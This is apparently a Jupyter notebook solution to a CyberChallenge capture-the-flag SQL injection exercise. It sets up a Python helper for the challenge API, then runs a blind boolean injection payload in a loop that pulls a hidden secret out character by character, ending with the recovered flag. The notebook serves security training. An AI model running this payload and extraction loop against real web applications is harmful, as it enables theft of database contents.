### WS_2.01 - SQL Injection tutorial - Level 3

In [10]:
import requests

class Inj:
    def __init__(self, host):
        self.sess = requests.Session()
        self.base_url = '{}/api/'.format(host)
        self._refresh_csrf_token()
    
    def _refresh_csrf_token(self):
        resp = self.sess.get(self.base_url + 'get_token')
        resp = resp.json()
        self.token = resp['token']
    
    def _do_raw_req(self, url, query):
        headers = {'X-CSRFToken': self.token}
        data = {'query': query }
        return self.sess.post(url,json=data, headers=headers).json()

    def logic(self, query):
        url = self.base_url + 'logic'
        response = self._do_raw_req(url, query)
        return response['result'], response['sql_error']
    
    def union(self, query):
        url = self.base_url + 'union'
        response = self._do_raw_req(url, query)
        return response['result'], response['sql_error']

    def blind(self, query):
        url = self.base_url + 'blind'
        response = self._do_raw_req(url, query)
        return response['result'], response['sql_error']

    def time(self, query):
        url = self.base_url + 'time'
        response = self._do_raw_req(url, query)
        return response['result'], response['sql_error']

In [11]:
inj = Inj('http://sqlinjection.challs.cyberchallenge.it')
payload = "1' AND (SELECT 1 FROM secret WHERE HEX(asecret) LIKE '{}%') = '1"

dictionary = '0123456789abcdef'
flag = ''

while True:
    for character in dictionary:
        question = payload.format(flag + character)
        response, error = inj.blind(question)
        
        if response == 'Success':
            flag += character
            break
    else:
        break

bytes.fromhex(flag).decode()

'CCIT{A_bl1ndy_fl4g}'